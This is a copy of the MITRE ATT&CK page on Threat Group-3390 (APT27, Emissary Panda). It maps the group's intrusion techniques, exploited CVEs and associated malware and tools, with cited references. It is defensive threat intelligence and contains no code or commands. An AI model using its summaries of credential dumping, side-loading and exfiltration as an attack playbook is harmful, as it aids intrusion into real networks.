Group description: Threat Group-3390
quality 2/10 · low quality
0 net
Threat Group-3390, Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse, Linen Typhoon, Group G0027 | MITRE ATT&CK®
ATT&CK v19 will be released April 28th! Check out this blog post for information on the planned deprecation of Enterprise's Defense Evasion tactic in the upcoming release.
Home
Groups
Threat Group-3390
Threat Group-3390
Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. [1] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors. [2] [3] [4]
ID: G0027
ⓘ
Associated Groups : Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse, Linen Typhoon
Contributors : Daniyal Naeem, BT Security; Kyaw Pyiyt Htet, @KyawPyiytHtet
Version : 3.0
Created: 31 May 2017
Last Modified: 15 October 2025
Version Permalink
Live Version
Associated Group Descriptions
Name
Description
Earth Smilodon
[5]
TG-3390
[1] [6] [7]
Emissary Panda
[8] [6] [3] [7] [9] [5]
BRONZE UNION
[2] [6]
APT27
[6] [3] [7] [5]
Iron Tiger
[7] [5]
LuckyMouse
[3] [7] [5]
Linen Typhoon
[10]
ATT&CK ® Navigator Layers
Enterprise Layer
download
view
Techniques Used
Domain
ID
Name
Use
Enterprise
T1548
.002
Abuse Elevation Control Mechanism : Bypass User Account Control
A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges. [6]
Enterprise
T1087
.001
Account Discovery : Local Account
Threat Group-3390 has used net user to conduct internal discovery of systems. [2]
Enterprise
T1583
.001
Acquire Infrastructure : Domains
Threat Group-3390 has registered domains for C2. [11]
Enterprise
T1071
.001
Application Layer Protocol : Web Protocols
Threat Group-3390 malware has used HTTP for C2. [3]
Enterprise
T1560
.002
Archive Collected Data : Archive via Library
Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration. [2]
Enterprise
T1119
Automated Collection
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. [2]
Enterprise
T1547
.001
Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder
Threat Group-3390 's malware can add a Registry key to Software\Microsoft\Windows\CurrentVersion\Run for persistence. [6] [11]
Enterprise
T1059
.001
Command and Scripting Interpreter : PowerShell
Threat Group-3390 has used PowerShell for execution. [2] [4]
.003
Command and Scripting Interpreter : Windows Command Shell
Threat Group-3390 has used command-line interfaces for execution. [2] [9]
Enterprise
T1543
.003
Create or Modify System Process : Windows Service
Threat Group-3390 's malware can create a new service, sometimes naming it after the config information, to gain persistence. [6] [11]
Enterprise
T1555
.005
Credentials from Password Stores : Password Managers
Threat Group-3390 obtained a KeePass database from a compromised host. [4]
Enterprise
T1005
Data from Local System
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. [2]
Enterprise
T1074
.001
Data Staged : Local Data Staging
Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts. [2]
.002
Data Staged : Remote Data Staging
Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration. [2]
Enterprise
T1030
Data Transfer Size Limits
Threat Group-3390 actors have split RAR files for exfiltration into parts. [1]
Enterprise
T1140
Deobfuscate/Decode Files or Information
During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression. [3]
Enterprise
T1189
Drive-by Compromise
Threat Group-3390 has extensively used strategic web compromises to target victims. [1] [3]
Enterprise
T1567
.002
Exfiltration Over Web Service : Exfiltration to Cloud Storage
Threat Group-3390 has exfiltrated stolen data to Dropbox. [4]
Enterprise
T1190
Exploit Public-Facing Application
Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server. [5]
Enterprise
T1203
Exploitation for Client Execution
Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor. [5]
Enterprise
T1068
Exploitation for Privilege Escalation
Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges. [2] [12]
Enterprise
T1210
Exploitation of Remote Services
Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network. [9]
Enterprise
T1133
External Remote Services
Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. [1] Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network. [2]
Enterprise
T1574
.001
Hijack Execution Flow : DLL
Threat Group-3390 has performed DLL search order hijacking to execute their payload. [6] Threat Group-3390 has also used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as rc.exe , a legitimate Microsoft Resource Compiler. [1] [2] [3] [9] [11]
Enterprise
T1562
.002
Impair Defenses : Disable Windows Event Logging
Threat Group-3390 has used appcmd.exe to disable logging on a victim server. [2]
Enterprise
T1070
.004
Indicator Removal : File Deletion
Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim. [2] [4]
.005
Indicator Removal : Network Share Connection Removal
Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection. [2]
Enterprise
T1105
Ingress Tool Transfer
Threat Group-3390 has downloaded additional malware and tools, including through the use of certutil , onto a compromised host . [1] [4]
Enterprise
T1056
.001
Input Capture : Keylogging
Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes. [1] [7] [3]
Enterprise
T1112
Modify Registry
A Threat Group-3390 tool has created new Registry keys under HKEY_CURRENT_USER\Software\Classes\ and HKLM\SYSTEM\CurrentControlSet\services . [6] [5]
Enterprise
T1046
Network Service Discovery
Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems. [1] [9]
Enterprise
T1027
.002
Obfuscated Files or Information : Software Packing
Threat Group-3390 has packed malware and tools, including using VMProtect. [4] [5]
.013
Obfuscated Files or Information : Encrypted/Encoded File
A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder. [6] [3] [9]
.015
Obfuscated Files or Information : Compression
Threat Group-3390 malware is compressed with LZNT1 compression. [6] [3] [9]
Enterprise
T1588
.002
Obtain Capabilities : Tool
Threat Group-3390 has obtained and used tools such as Impacket , pwdump , Mimikatz , gsecdump , NBTscan , and Windows Credential Editor . [9] [1]
.003
Obtain Capabilities : Code Signing Certificates
Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations. [11]
Enterprise
T1003
.001
OS Credential Dumping : LSASS Memory
Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers. [1] [2]
.002
OS Credential Dumping : Security Account Manager
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers. [1] [2]
.004
OS Credential Dumping : LSA Secrets
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers. [1] [2]
Enterprise
T1566
.001
Phishing : Spearphishing Attachment
Threat Group-3390 has used e-mail to deliver malicious attachments to victims. [4]
Enterprise
T1055
.012
Process Injection : Process Hollowing
A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process. [6] [3]
Enterprise
T1012
Query Registry
A Threat Group-3390 tool can read and decrypt stored Registry values. [6]
Enterprise
T1021
.006
Remote Services : Windows Remote Management
Threat Group-3390 has used WinRM to enable remote execution. [2]
Enterprise
T1018
Remote System Discovery
Threat Group-3390 has used the net view command. [6]
Enterprise
T1053
.002
Scheduled Task/Job : At
Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network. [1]
Enterprise
T1505
.003
Server Software Component : Web Shell
Threat Group-3390 has used a variety of Web shells. [9]
Enterprise
T1608
.001
Stage Capabilities : Upload Malware
Threat Group-3390 has hosted malicious payloads on Dropbox. [4]
.002
Stage Capabilities : Upload Tool
Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites. [1]
.004
Stage Capabilities : Drive-by Target
Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest. [8]
Enterprise
T1195
.002
Supply Chain Compromise : Compromise Software Supply Chain
Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments. [5]
Enterprise
T1016
System Network Configuration Discovery
Threat Group-3390 actors use NBTscan to discover vulnerable systems. [1]
Enterprise
T1049
System Network Connections Discovery
Threat Group-3390 has used net use and netstat to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim. [2]
Enterprise
T1033
System Owner/User Discovery
Threat Group-3390 has used whoami to collect system user information. [4]
Enterprise
T1199
Trusted Relationship
Threat Group-3390 has compromised third party service providers to gain access to victim's environments. [12]
Enterprise
T1204
.002
User Execution : Malicious File
Threat Group-3390 has lured victims into opening malicious files containing malware. [4]
Enterprise
T1078
Valid Accounts
Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. [1]
Enterprise
T1047
Windows Management Instrumentation
A Threat Group-3390 tool can use WMI to execute a binary. [6]
Software
ID
Name
References
Techniques
S0073
ASPXSpy
Threat Group-3390 has used a modified version of ASPXSpy called ASPXTool. [1] [12]
Server Software Component : Web Shell
S0160
certutil
[4]
Archive Collected Data : Archive via Utility , Deobfuscate/Decode Files or Information , Ingress Tool Transfer , Subvert Trust Controls : Install Root Certificate
S0020
China Chopper
[1] [2] [6] [9]
Application Layer Protocol : Web Protocols , Brute Force : Password Guessing , Command and Scripting Interpreter : Windows Command Shell , Data from Local System , File and Directory Discovery , Indicator Removal : Timestomp , Ingress Tool Transfer , Network Service Discovery , Obfuscated Files or Information : Software Packing , Server Software Component : Web Shell
S0660
Clambling
[4] [12] [5]
Abuse Elevation Control Mechanism : Bypass User Account Control , Application Layer Protocol , Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Clipboard Data , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Create or Modify System Process : Windows Service , Data from Local System , Deobfuscate/Decode Files or Information , Exfiltration Over Web Service : Exfiltration to Cloud Storage , File and Directory Discovery , Hide Artifacts : Hidden Files and Directories , Hijack Execution Flow : DLL , Input Capture : Keylogging , Modify Registry , Network Share Discovery , Non-Application Layer Protocol , Obfuscated Files or Information , Phishing : Spearphishing Attachment , Process Discovery , Process Injection , Process Injection : Process Hollowing , Query Registry , Screen Capture , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery , System Services : Service Execution , System Time Discovery , User Execution : Malicious File , Video Capture , Virtualization/Sandbox Evasion : Time Based Checks , Web Service : Bidirectional Communication
S0154
Cobalt Strike
[4]
Abuse Elevation Control Mechanism : Sudo and Sudo Caching , Abuse Elevation Control Mechanism : Bypass User Account Control , Access Token Manipulation : Parent PID Spoofing , Access Token Manipulation : Token Impersonation/Theft , Access Token Manipulation : Make and Impersonate Token , Account Discovery : Domain Account , Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Application Layer Protocol : File Transfer Protocols , BITS Jobs , Browser Session Hijacking , Command and Scripting Interpreter : JavaScript , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Python , Command and Scripting Interpreter : Windows Command Shell , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Data from Local System , Data Obfuscation : Protocol or Service Impersonation , Data Transfer Size Limits , Deobfuscate/Decode Files or Information , Encrypted Channel : Asymmetric Cryptography , Encrypted Channel : Symmetric Cryptography , Exploitation for Client Execution , Exploitation for Privilege Escalation , File and Directory Discovery , Hide Artifacts : Process Argument Spoofing , Impair Defenses : Disable or Modify Tools , Indicator Removal : Timestomp , Ingress Tool Transfer , Input Capture : Keylogging , Modify Registry , Native API , Network Service Discovery , Network Share Discovery , Non-Application Layer Protocol , Obfuscated Files or Information : Indicator Removal from Tools , Obfuscated Files or Information , Office Application Startup : Office Template Macros , OS Credential Dumping : LSASS Memory , OS Credential Dumping : Security Account Manager , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Process Discovery , Process Injection : Dynamic-link Library Injection , Process Injection : Process Hollowing , Process Injection , Protocol Tunneling , Proxy : Domain Fronting , Proxy : Internal Proxy , Query Registry , Reflective Code Loading , Remote Services : Remote Desktop Protocol , Remote Services : SSH , Remote Services : Windows Remote Management , Remote Services : SMB/Windows Admin Shares , Remote Services : Distributed Component Object Model , Remote System Discovery , Scheduled Transfer , Screen Capture , Software Discovery , Subvert Trust Controls : Code Signing , System Binary Proxy Execution : Rundll32 , System Network Configuration Discovery , System Network Connections Discovery , System Service Discovery , System Services : Service Execution , Use Alternate Authentication Material : Pass the Hash , Valid Accounts : Domain Accounts , Valid Accounts : Local Accounts , Windows Management Instrumentation
S0032
gh0st RAT
[13]
Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Deobfuscate/Decode Files or Information , Dynamic Resolution : Fast Flux DNS , Encrypted Channel : Symmetric Cryptography , Encrypted Channel , Hijack Execution Flow : DLL , Indicator Removal : Clear Windows Event Logs , Indicator Removal : File Deletion , Ingress Tool Transfer , Input Capture : Keylogging , Modify Registry , Native API , Non-Application Layer Protocol , Process Discovery , Process Injection , Query Registry , Screen Capture , Shared Modules , System Binary Proxy Execution : Rundll32 , System Information Discovery , System Services : Service Execution
S0008
gsecdump
[1]
OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSA Secrets
S0070
HTTPBrowser
[1] [2] [6] [5]
Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter : Windows Command Shell , File and Directory Discovery , Hijack Execution Flow : DLL , Indicator Removal : File Deletion , Ingress Tool Transfer , Input Capture : Keylogging , Masquerading : Match Legitimate Resource Name or Location , Obfuscated Files or Information
S0398
HyperBro
[9] [3] [7] [4] [5]
Application Layer Protocol : Web Protocols , Deobfuscate/Decode Files or Information , Hijack Execution Flow : DLL , Indicator Removal : File Deletion , Ingress Tool Transfer , Native API , Obfuscated Files or Information : Software Packing , Obfuscated Files or Information : Encrypted/Encoded File , Process Injection , Screen Capture , System Service Discovery , System Services : Service Execution
S0357
Impacket
[9]
Adversary-in-the-Middle : LLMNR/NBT-NS Poisoning and SMB Relay , Lateral Tool Transfer , Network Sniffing , OS Credential Dumping : NTDS , OS Credential Dumping : LSASS Memory , OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSA Secrets , Steal or Forge Kerberos Tickets : Kerberoasting , Steal or Forge Kerberos Tickets : Ccache Files , System Services : Service Execution , Windows Management Instrumentation
S0100
ipconfig
[2]
System Network Configuration Discovery
S0002
Mimikatz
Threat Group-3390 has used a modified version of Mimikatz called Wrapikatz. [2] [6] [4] [14] [12]
Access Token Manipulation : SID-History Injection , Account Manipulation , Boot or Logon Autostart Execution : Security Support Provider , Credentials from Password Stores , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores : Windows Credential Manager , OS Credential Dumping : DCSync , OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSASS Memory , OS Credential Dumping : LSA Secrets , Rogue Domain Controller , Steal or Forge Authentication Certificates , Steal or Forge Kerberos Tickets : Golden Ticket , Steal or Forge Kerberos Tickets : Silver Ticket , Unsecured Credentials : Private Keys , Use Alternate Authentication Material : Pass the Hash , Use Alternate Authentication Material : Pass the Ticket
S0590
NBTscan
[1] [4]
Network Service Discovery , Network Sniffing , Remote System Discovery , System Network Configuration Discovery , System Owner/User Discovery
S0039
Net
[2]
Account Discovery : Domain Account , Account Discovery : Local Account , Account Manipulation : Additional Local or Domain Groups , Create Account : Local Account , Create Account : Domain Account , Indicator Removal : Network Share Connection Removal , Network Share Discovery , Password Policy Discovery , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Remote Services : SMB/Windows Admin Shares , Remote System Discovery , System Network Connections Discovery , System Service Discovery , System Services : Service Execution , System Time Discovery
S0104
netstat
[4]
System Network Connections Discovery
S0664
Pandora
[5]
Application Layer Protocol : Web Protocols , Create or Modify System Process : Windows Service , Encrypted Channel : Symmetric Cryptography , Exploitation for Privilege Escalation , Hijack Execution Flow : DLL , Ingress Tool Transfer , Modify Registry , Obfuscated Files or Information : Compression , Process Discovery , Process Injection , Subvert Trust Controls : Code Signing Policy Modification , System Services : Service Execution , Traffic Signaling
S0013
PlugX
[1] [2] [6] [4] [12]
Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter : Windows Command Shell , Create or Modify System Process : Windows Service , Data Staged : Local Data Staging , Debugger Evasion , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Execution Guardrails : Mutual Exclusion , Exfiltration Over C2 Channel , File and Directory Discovery , Hide Artifacts : Hidden Files and Directories , Hide Artifacts : Hidden Window , Hijack Execution Flow : DLL , Impair Defenses : Disable or Modify System Firewall , Indicator Removal : Clear Persistence , Indicator Removal : File Deletion , Ingress Tool Transfer , Input Capture : Keylogging , Local Storage Discovery , Masquerading : Masquerade Task or Service , Masquerading : Match Legitimate Resource Name or Location , Modify Registry , Native API , Network Share Discovery , Non-Application Layer Protocol , Non-Standard Port , Obfuscated Files or Information : Binary Padding , Obfuscated Files or Information : Dynamic API Resolution , Obfuscated Files or Information , Obfuscated Files or Information : Encrypted/Encoded File , Peripheral Device Discovery , Process Discovery , Query Registry , Reflective Code Loading , Replication Through Removable Media , Scheduled Task/Job : Scheduled Task , Screen Capture , System Information Discovery , System Location Discovery , System Network Configuration Discovery , System Network Connections Discovery , System Owner/User Discovery , System Time Discovery , Trusted Developer Utilities Proxy Execution : MSBuild , User Execution : Malicious File , Virtualization/Sandbox Evasion : System Checks , Web Service : Dead Drop Resolver
S0006
pwdump
[9]
OS Credential Dumping : Security Account Manager
S0662
RCSession
[5] [4] [12]
Abuse Elevation Control Mechanism : Bypass User Account Control , Application Layer Protocol : Web Protocols , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Command and Scripting Interpreter : Windows Command Shell , Data from Local System , Encrypted Channel , Hijack Execution Flow : DLL , Indicator Removal : File Deletion , Ingress Tool Transfer , Input Capture : Keylogging , Masquerading , Modify Registry , Native API , Non-Application Layer Protocol , Obfuscated Files or Information : Compression , Obfuscated Files or Information : Fileless Storage , Process Discovery , Process Injection : Process Hollowing , Screen Capture , System Binary Proxy Execution : Msiexec , System Information Discovery , System Owner/User Discovery
S0096
Systeminfo
[4]
System Information Discovery
S0663
SysUpdate
[5]
Application Layer Protocol : DNS , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Create or Modify System Process : Systemd Service , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Data from Local System , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , File and Directory Discovery , Hide Artifacts : Hidden Files and Directories , Hijack Execution Flow : DLL , Indicator Removal : File Deletion , Ingress Tool Transfer , Local Storage Discovery , Masquerading : Masquerade Task or Service , Modify Registry , Native API , Obfuscated Files or Information : Fileless Storage , Obfuscated Files or Information : Encrypted/Encoded File , Obfuscated Files or Information : Software Packing , Process Discovery , Screen Capture , Subvert Trust Controls : Code Signing , System Information Discovery , System Network Configuration Discovery : Internet Connection Discovery , System Network Configuration Discovery , System Owner/User Discovery , System Service Discovery , System Services : Service Execution , Windows Management Instrumentation
S0057
Tasklist
[4]
Process Discovery , Software Discovery : Security Software Discovery , System Service Discovery
S0005
Windows Credential Editor
[1]
OS Credential Dumping : LSASS Memory
S0412
ZxShell
[13]
Access Token Manipulation : Create Process with Token , Application Layer Protocol : Web Protocols , Application Layer Protocol : File Transfer Protocols , Command and Scripting Interpreter : Windows Command Shell , Create Account : Local Account , Create or Modify System Process : Windows Service , Data from Local System , Endpoint Denial of Service , Exploit Public-Facing Application , File and Directory Discovery , Impair Defenses : Disable or Modify System Firewall , Impair Defenses : Disable or Modify Tools , Indicator Removal : Clear Windows Event Logs , Indicator Removal : File Deletion , Ingress Tool Transfer , Input Capture : Credential API Hooking , Input Capture : Keylogging , Modify Registry , Native API , Network Service Discovery , Non-Standard Port , Process Discovery , Process Injection : Dynamic-link Library Injection , Proxy , Query Registry , Remote Services : VNC , Remote Services : Remote Desktop Protocol , Screen Capture , System Binary Proxy Execution : Rundll32 , System Information Discovery , System Owner/User Discovery , System Service Discovery , System Services : Service Execution , Video Capture
References
Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.
Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.
Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.
Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
Microsoft. (2025, September 8). How Microsoft names threat actors. Retrieved September 10, 2025.
Daniel Lunghi. (2023, March 1). Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.
Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.
Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
×
load more results